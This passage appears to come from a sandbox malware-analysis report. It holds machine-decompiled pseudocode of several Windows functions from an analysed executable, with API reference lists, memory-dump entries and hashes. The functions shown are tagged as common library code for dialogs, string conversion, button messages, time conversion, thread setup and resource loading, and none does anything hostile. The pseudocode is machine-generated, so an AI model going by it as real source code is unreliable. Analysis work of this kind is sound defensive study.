					_t68 = 0xfffffdf8;
					 *((intOrPtr*)(_t71 - 4)) = 0;
					if(_t60 != 0xfffffdf8 || (_t70[0x19] & 0x00000001) == 0) {
						if(_t60 != 0xfffffdee || (_t70[0x2d] & 0x00000001) == 0) {
							goto L8;
						} else {
							goto L7;
						}
					} else {
						L7:
						_t37 = GetDlgCtrlID(_t37);
						L8:
						if(_t37 == 0) {
							L12:
							if(_t70[2] != _t68) {
								_t68 =  &(_t70[4]);
								_t38 = MultiByteToWideChar(3, 0,  *(_t71 - 0x114), 0xffffffff, _t68, 0x50);
								if(_t68 != 0 && _t38 > 0x50) {
									_t38 = E009A54F0(0, _t60, _t66, _t68, _t70, 0x80004005);
								}
								if(_t38 > 0 && _t68 != 0) {
									 *((short*)(_t68 + _t38 * 2 - 2)) = 0;
								}
							} else {
								E009A6677(_t60, E00AAD17D( &(_t70[4]), 0x50,  *(_t71 - 0x114), 0xffffffff));
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t71 - 0x118)))) = 0;
							SetWindowPos( *_t70, 0, 0, 0, 0, 0, 0x213);
							E009A5510( &(( *(_t71 - 0x114))[0xfffffffffffffff0]), _t66);
							L21:
							return E00AAD31E(0, _t68, _t70);
						}
						_t60 = _t71 - 0x110;
						if(E009BE4C2(0, _t71 - 0x110, _t68, _t70, _t37, _t71 - 0x110, 0x100) != 0) {
							E009BE527(0, _t71 - 0x114, _t71 - 0x110, 1, 0xa);
							goto L12;
						}
						E009A5510( &(( *(_t71 - 0x114))[0xfffffffffffffff0]), _t66);
						goto L21;
					}
				}
				L1:
				_t34 = E009B8782(_t57);
				goto L2;
			}












      0x009a8c8f
      0x009a8c8f
      0x009a8c99
      0x009a8c9e
      0x009a8ca1
      0x009a8ca8
      0x009a8caa
      0x009a8cad
      0x009a8cb5
      0x009a8cbc
      0x009a8cbe
      0x009a8cc0
      0x009a8cc5
      0x00000000
      0x00000000
      0x009a8cd3
      0x009a8cd8
      0x009a8cdb
      0x009a8cde
      0x009a8ce3
      0x009a8ce8
      0x009a8cf6
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a8d01
      0x009a8d01
      0x009a8d02
      0x009a8d08
      0x009a8d0a
      0x009a8d4e
      0x009a8d51
      0x009a8d73
      0x009a8d82
      0x009a8d8a
      0x009a8d96
      0x009a8d96
      0x009a8d9d
      0x009a8da5
      0x009a8da5
      0x009a8d53
      0x009a8d67
      0x009a8d6c
      0x009a8dba
      0x009a8dbe
      0x009a8dcd
      0x009a8dd5
      0x009a8dda
      0x009a8dda
      0x009a8d11
      0x009a8d20
      0x009a8d49
      0x00000000
      0x009a8d49
      0x009a8d2b
      0x00000000
      0x009a8d30
      0x009a8ce8
      0x009a8cb7
      0x009a8cb7
      0x00000000

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009A8C99
      • GetDlgCtrlID.USER32 ref: 009A8D02
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,0000010C), ref: 009A8D82
      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 009A8DBE
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharCtrlException@8H_prolog3_MultiThrowWideWindow
      • String ID:
      • API String ID: 2836953783-0
      • Opcode ID: 52587d47c07a23adcbcd6520720398f5fb1e5ae4e2a931d1445d2fff50350719
      • Instruction ID: 761fc7accce9172c1703eb8aa219acb54298707a95df70ade60001343d53cb68
      • Opcode Fuzzy Hash: 52587d47c07a23adcbcd6520720398f5fb1e5ae4e2a931d1445d2fff50350719
      • Instruction Fuzzy Hash: 1D31E871A006199BCF249BB48D86BEF73ACAF56310F100A6DF657A71D0DF709D80CAA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AC021F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 100%
      			E00AC021F(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t74;

				_t74 = _a8;
				if(_t74 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t74 != 0) {
						E00AAD02F( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00ABC6B2( *_t74 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00AADB06(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t74[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t74 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















      0x00ac0229
      0x00ac0230
      0x00ac0247
      0x00000000
      0x00ac0237
      0x00ac0239
      0x00ac0253
      0x00ac0258
      0x00ac025b
      0x00ac025e
      0x00ac0286
      0x00ac028d
      0x00ac028f
      0x00ac0310
      0x00ac032b
      0x00ac032d
      0x00ac026d
      0x00ac026d
      0x00ac0270
      0x00ac0272
      0x00ac0275
      0x00ac0275
      0x00ac0275
      0x00ac0275
      0x00000000
      0x00ac027b
      0x00ac02ef
      0x00ac02ef
      0x00ac02f4
      0x00ac02fa
      0x00ac02fd
      0x00ac02ff
      0x00ac0302
      0x00ac0302
      0x00ac0302
      0x00ac0302
      0x00000000
      0x00ac0306
      0x00ac0291
      0x00ac0294
      0x00ac029a
      0x00ac029d
      0x00ac02c4
      0x00ac02c7
      0x00ac02cd
      0x00000000
      0x00000000
      0x00ac02cf
      0x00ac02d2
      0x00000000
      0x00000000
      0x00ac02d4
      0x00ac02d4
      0x00ac02da
      0x00ac02dd
      0x00ac024c
      0x00ac024c
      0x00ac02e6
      0x00000000
      0x00ac02e6
      0x00ac029f
      0x00ac02a2
      0x00000000
      0x00000000
      0x00ac02a6
      0x00ac02b7
      0x00ac02bd
      0x00ac02bf
      0x00ac02c2
      0x00000000
      0x00000000
      0x00000000
      0x00ac02c2
      0x00ac0260
      0x00ac0263
      0x00ac0265
      0x00ac026a
      0x00ac026a
      0x00000000
      0x00ac023b
      0x00ac023b
      0x00ac0240
      0x00ac0244
      0x00ac0244
      0x00000000
      0x00ac0240
      0x00ac0239

      APIs
      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AC0253
      • __isleadbyte_l.LIBCMT ref: 00AC0286
      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 00AC02B7
      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 00AC0325
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
      • String ID:
      • API String ID: 3058430110-0
      • Opcode ID: 588133b2cc40322731b5825e9eecc4a3ef0924a44e1c789ae64c91246a3eb8e2
      • Instruction ID: 07b4547c97bca9566f2cd1ef24c30db00971d87dc63a947971caeeba1b561e76
      • Opcode Fuzzy Hash: 588133b2cc40322731b5825e9eecc4a3ef0924a44e1c789ae64c91246a3eb8e2
      • Instruction Fuzzy Hash: FE317C31A01295EFDB20DFA4C889FEE3BB5AF01311F1A856DE6659B191D730DD80DB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1011 Relevance: 6.1, APIs: 4, Instructions: 96windowCOMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009B1011(long* __ecx, long _a4) {
				long* _v8;
				void* __ebp;
				long* _t26;
				long _t27;
				struct HWND__** _t33;
				struct HWND__** _t35;
				long* _t36;

				_t36 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				if(__ecx[0x1a] != 0) {
					_t33 = _a4;
					if(_t33 != 0) {
						if(_t33[2] == 0) {
							L5:
							_t38 = _t36[0x1a] + 0x40;
							_t26 = E009BBD4F(_t36[0x1a] + 0x40, _t33, 0);
							_v8 = _t26;
							if(_t26 == 0) {
								L6:
								_t26 = E009B8782(_t38);
							}
							_t27 =  *_t26;
							if(_t27 == 0) {
								L15:
								_t25 = _v8[1];
								if(_t25 != 0) {
									while(_t25 != 0) {
										_t35 =  *(_t25 + 8);
										_a4 =  *((intOrPtr*)(_t25 + 4));
										if(_t35[2] == 0 || SendMessageA( *_t35, 0xf0, 0, 0) != 1) {
											_t38 = _t35;
											_t25 = E009B0CB1(_t25, _t35);
											if((_t25 & 0x00020000) == 0) {
												if(_a4 != 0) {
													_t25 = _a4;
													continue;
												} else {
												}
											}
										} else {
											goto L24;
										}
										goto L25;
									}
									goto L6;
								}
							} else {
								while(_t27 != 0) {
									_t35 =  *(_t27 + 8);
									_a4 =  *_t27;
									_t38 = _t35;
									if((E009B0CB1(_t27, _t35) & 0x00020000) != 0) {
										goto L15;
									} else {
										if(_t35[2] == 0 || SendMessageA( *_t35, 0xf0, 0, 0) != 1) {
											if(_a4 != 0) {
												_t27 = _a4;
												continue;
											} else {
												goto L15;
											}
										} else {
											goto L24;
										}
									}
									goto L25;
								}
								goto L6;
							}
						} else {
							if(SendMessageA( *_t33, 0xf0, 0, 0) == 1) {
								L24:
								_t25 = SendMessageA( *_t35, 0xf1, 0, 0);
							} else {
								_t36 = _v8;
								goto L5;
							}
						}
						L25:
					}
				}
				return _t25;
			}










      0x009b1011
      0x009b1016
      0x009b101a
      0x009b1020
      0x009b1027
      0x009b102c
      0x009b103c
      0x009b1055
      0x009b105a
      0x009b105d
      0x009b1062
      0x009b1067
      0x009b1069
      0x009b1069
      0x009b1069
      0x009b106e
      0x009b1072
      0x009b10ad
      0x009b10b0
      0x009b10b5
      0x009b10bc
      0x009b10c0
      0x009b10c6
      0x009b10cc
      0x009b10de
      0x009b10e0
      0x009b10ea
      0x009b10ef
      0x009b10b9
      0x00000000
      0x00000000
      0x009b10f1
      0x009b10ef
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b10cc
      0x00000000
      0x009b10bc
      0x009b1074
      0x009b1079
      0x009b107f
      0x009b1082
      0x009b1085
      0x009b1091
      0x00000000
      0x009b1093
      0x009b1096
      0x009b10ab
      0x009b1076
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b1096
      0x00000000
      0x009b1091
      0x00000000
      0x009b1079
      0x009b103e
      0x009b104c
      0x009b10f3
      0x009b10fc
      0x009b1052
      0x009b1052
      0x00000000
      0x009b1052
      0x009b104c
      0x009b10fe
      0x009b10fe
      0x009b10ff
      0x009b1102

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageSend
      • String ID:
      • API String ID: 3850602802-0
      • Opcode ID: 5ef781777cb52fd579ec7bfa5f6a0dab838c852f61865c9d41d661e9871e6843
      • Instruction ID: 818450f81050e9dd19dc2d4e5162d69ce8cf1dffc14a51544908c7a3e59e6a2f
      • Opcode Fuzzy Hash: 5ef781777cb52fd579ec7bfa5f6a0dab838c852f61865c9d41d661e9871e6843
      • Instruction Fuzzy Hash: 48317830640244EFCB31EF09CAE5EEABBAEEBC5760F64416AE4058B255D671DDC0DB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009D2F8C Relevance: 6.1, APIs: 4, Instructions: 63timeCOMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009D2F8C(intOrPtr __ebx, void* __ecx, intOrPtr __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _FILETIME _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				int _t26;
				intOrPtr _t34;
				intOrPtr _t44;
				struct _FILETIME* _t45;
				intOrPtr _t46;
				signed int _t48;

				_t44 = __edx;
				_t34 = __ebx;
				_t15 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t15 ^ _t48;
				_t46 = _a4;
				_t45 = _a8;
				_t49 = _t45;
				if(_t45 == 0) {
					E009B8782(__ecx);
				}
				_v24.wYear = E009D2CF8(_t34, _t46, _t44, _t49);
				_v24.wMonth = E009D2D2F(_t34, _t46, _t44, _t49);
				_v24.wDay = E009D2D62(_t34, _t46, _t44, _t49);
				_v24.wHour = E009D2D94(_t34, _t46, _t44, _t49);
				_v24.wMinute = E009D2DC7(_t34, _t46, _t44, _t49);
				_v24.wSecond = E009D2DFA(_t34, _t46, _t44, _t49);
				_v24.wMilliseconds = 0;
				_t26 = SystemTimeToFileTime( &_v24,  &_v32);
				_t47 = GetLastError;
				if(_t26 == 0) {
					E009D38EF(_t34, _t44, _t45, GetLastError, GetLastError(), 0);
				}
				if(LocalFileTimeToFileTime( &_v32, _t45) == 0) {
					_t28 = E009D38EF(_t34, _t44, _t45, _t47, GetLastError(), _t28);
				}
				return E00AAB46A(_t28, _t34, _v8 ^ _t48, _t44, _t45, _t47);
			}
















      0x009d2f8c
      0x009d2f8c
      0x009d2f94
      0x009d2f9b
      0x009d2f9f
      0x009d2fa3
      0x009d2fa6
      0x009d2fa8
      0x009d2faa
      0x009d2faa
      0x009d2fb8
      0x009d2fc3
      0x009d2fce
      0x009d2fd9
      0x009d2fe4
      0x009d2fed
      0x009d2ff3
      0x009d2fff
      0x009d3005
      0x009d300d
      0x009d3014
      0x009d3014
      0x009d3026
      0x009d302c
      0x009d302c
      0x009d303e

      APIs
      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009D2FFF
      • GetLastError.KERNEL32(00000000,?,?), ref: 009D3011
      • LocalFileTimeToFileTime.KERNEL32(?,00001000,?,?), ref: 009D301E
      • GetLastError.KERNEL32(00000000,?,?), ref: 009D3029
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Time$File$ErrorLast$Exception@8LocalSystemThrow
      • String ID:
      • API String ID: 3139533385-0
      • Opcode ID: 777c1377488c05401c4281bb9d4c9e04068574ab9a3b92d5821629d0447f78b6
      • Instruction ID: 4f76e7105d026e701198062c88ffe29df32f317419492ddf7cfa8593970ea017
      • Opcode Fuzzy Hash: 777c1377488c05401c4281bb9d4c9e04068574ab9a3b92d5821629d0447f78b6
      • Instruction Fuzzy Hash: 10119125E50258A7CF00FFF8C805A9E77BDAF98700B00C45BB801E7351EE309B0197A5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B210A Relevance: 6.1, APIs: 4, Instructions: 61threadCOMMON
      Download Yara Rule
      C-Code - Quality: 95%
      			E009B210A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				intOrPtr _t48;
				void* _t50;
				intOrPtr* _t55;
				void* _t56;
				void* _t57;

				_t57 = __eflags;
				_t51 = __ecx;
				_t49 = __ebx;
				_push(4);
				E00AAD232(0xac8229, __ebx, __edi, __esi);
				_t55 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E009B2E7D(__ebx, __ecx, __edi, __ecx, _t57);
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *_t55 = 0xad912c;
				_t58 =  *((intOrPtr*)(_t56 + 8));
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(_t55 + 0x50)) = 0;
				} else {
					_t48 = E00AAF4C4( *((intOrPtr*)(_t56 + 8)));
					_pop(_t51);
					 *((intOrPtr*)(_t55 + 0x50)) = _t48;
				}
				_t50 = E009BD77F(_t49, 0, _t55, _t58);
				_t59 = _t50;
				if(_t50 == 0) {
					L4:
					E009B8782(_t51);
				}
				_t7 = _t50 + 0x74; // 0x74
				_t51 = _t7;
				_t41 = E009A843B(_t50, _t7, 0, _t55, _t59);
				if(_t41 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t41 + 4)) = _t55;
				 *((intOrPtr*)(_t55 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t55 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t50 + 4)) = _t55;
				 *((short*)(_t55 + 0x9a)) = 0;
				 *((short*)(_t55 + 0x98)) = 0;
				 *((intOrPtr*)(_t55 + 0x44)) = 0;
				 *((intOrPtr*)(_t55 + 0x80)) = 0;
				 *((intOrPtr*)(_t55 + 0x68)) = 0;
				 *((intOrPtr*)(_t55 + 0x6c)) = 0;
				 *((intOrPtr*)(_t55 + 0x58)) = 0;
				 *((intOrPtr*)(_t55 + 0x64)) = 0;
				 *((intOrPtr*)(_t55 + 0x8c)) = 0;
				 *((intOrPtr*)(_t55 + 0x5c)) = 0;
				 *((intOrPtr*)(_t55 + 0x48)) = 0;
				 *((intOrPtr*)(_t55 + 0x94)) = 0;
				 *((intOrPtr*)(_t55 + 0x90)) = 0;
				 *((intOrPtr*)(_t55 + 0x84)) = 0;
				 *((intOrPtr*)(_t55 + 0x88)) = 0;
				 *((intOrPtr*)(_t55 + 0x74)) = 0;
				 *((intOrPtr*)(_t55 + 0x78)) = 0;
				 *((intOrPtr*)(_t55 + 0x9c)) = 0;
				 *((intOrPtr*)(_t55 + 0xa4)) = 0;
				 *((intOrPtr*)(_t55 + 0x60)) = 0;
				 *((intOrPtr*)(_t55 + 0x70)) = 0;
				 *((intOrPtr*)(_t55 + 0xa0)) = 0x200;
				 *((intOrPtr*)(_t55 + 0xac)) = 0;
				 *((intOrPtr*)(_t55 + 0xb0)) = 0x493e0;
				 *((intOrPtr*)(_t55 + 0xb4)) = 1;
				return E00AAD30A(_t55);
			}









      0x009b210a
      0x009b210a
      0x009b210a
      0x009b210a
      0x009b2111
      0x009b2116
      0x009b2118
      0x009b211b
      0x009b2122
      0x009b2125
      0x009b212b
      0x009b212e
      0x009b213e
      0x009b2130
      0x009b2133
      0x009b2138
      0x009b2139
      0x009b2139
      0x009b2146
      0x009b2148
      0x009b214a
      0x009b214c
      0x009b214c
      0x009b214c
      0x009b2151
      0x009b2151
      0x009b2154
      0x009b215b
      0x00000000
      0x00000000
      0x009b215d
      0x009b2166
      0x009b216f
      0x009b2172
      0x009b2177
      0x009b217e
      0x009b2185
      0x009b2188
      0x009b218e
      0x009b2191
      0x009b2194
      0x009b2197
      0x009b219a
      0x009b21a0
      0x009b21a3
      0x009b21a6
      0x009b21ac
      0x009b21b2
      0x009b21b8
      0x009b21be
      0x009b21c1
      0x009b21c4
      0x009b21ca
      0x009b21d0
      0x009b21d3
      0x009b21d6
      0x009b21e0
      0x009b21e6
      0x009b21f0
      0x009b2201

      APIs
      • __EH_prolog3.LIBCMT ref: 009B2111
        • Part of subcall function 009B2E7D: __EH_prolog3.LIBCMT ref: 009B2E84
      • __strdup.LIBCMT ref: 009B2133
      • GetCurrentThread.KERNEL32 ref: 009B2160
      • GetCurrentThreadId.KERNEL32 ref: 009B2169
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CurrentH_prolog3Thread$__strdup
      • String ID:
      • API String ID: 4206445780-0
      • Opcode ID: 138178b98f59d2dd5e35423d389c9eb75695a7f67c7874be5c2e92a2829e6b66
      • Instruction ID: f3782d452525dd22cf407dd43da3aafb394453b33533a012a9d4f7e642be1d66
      • Opcode Fuzzy Hash: 138178b98f59d2dd5e35423d389c9eb75695a7f67c7874be5c2e92a2829e6b66
      • Instruction Fuzzy Hash: D9317CB0901B008FD721DF7AC68538AFBE8BFA5710F10891FD5AA87622DBB0A541CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B4B50 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
      Download Yara Rule
      C-Code - Quality: 90%
      			E009B4B50(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t31;
				struct HINSTANCE__* _t33;
				signed int _t35;
				signed int _t36;
				void* _t38;
				signed int* _t41;

				_push(__ecx);
				_push(_t29);
				_t38 = __ecx;
				_t43 =  *((intOrPtr*)(__ecx + 0x78));
				_t41 =  *(__ecx + 0x80);
				_v8 =  *((intOrPtr*)(__ecx + 0x7c));
				if( *((intOrPtr*)(__ecx + 0x78)) != 0) {
					_t33 =  *(E009BD77F(_t29, __ecx, _t41, _t43) + 0xc);
					_v8 = LoadResource(_t33, FindResourceA(_t33,  *(_t38 + 0x78), 5));
				}
				if(_v8 != 0) {
					_t41 = LockResource(_v8);
				}
				_t31 = 1;
				if(_t41 != 0) {
					_t36 =  *_t41;
					if(_t41[0] != 0xffff) {
						_t24 = _t41[2] & 0x0000ffff;
						_t35 = _t41[3] & 0x0000ffff;
					} else {
						_t36 = _t41[3];
						_t24 = _t41[4] & 0x0000ffff;
						_t35 = _t41[5] & 0x0000ffff;
					}
					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
						_t31 = 0;
					}
				}
				if( *(_t38 + 0x78) != 0) {
					FreeResource(_v8);
				}
				return _t31;
			}
















      0x009b4b55
      0x009b4b56
      0x009b4b59
      0x009b4b5b
      0x009b4b62
      0x009b4b68
      0x009b4b6b
      0x009b4b72
      0x009b4b89
      0x009b4b89
      0x009b4b90
      0x009b4b9b
      0x009b4b9b
      0x009b4b9f
      0x009b4ba2
      0x009b4ba4
      0x009b4baf
      0x009b4bbe
      0x009b4bc2
      0x009b4bb1
      0x009b4bb1
      0x009b4bb4
      0x009b4bb8
      0x009b4bb8
      0x009b4bcc
      0x009b4bd8
      0x009b4bd8
      0x009b4bcc
      0x009b4bde
      0x009b4be3
      0x009b4be3
      0x009b4bef

      APIs
      • FindResourceA.KERNEL32(?,00000000,00000005), ref: 009B4B7B
      • LoadResource.KERNEL32(?,00000000), ref: 009B4B83
      • LockResource.KERNEL32(00000000), ref: 009B4B95
      • FreeResource.KERNEL32(00000000), ref: 009B4BE3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
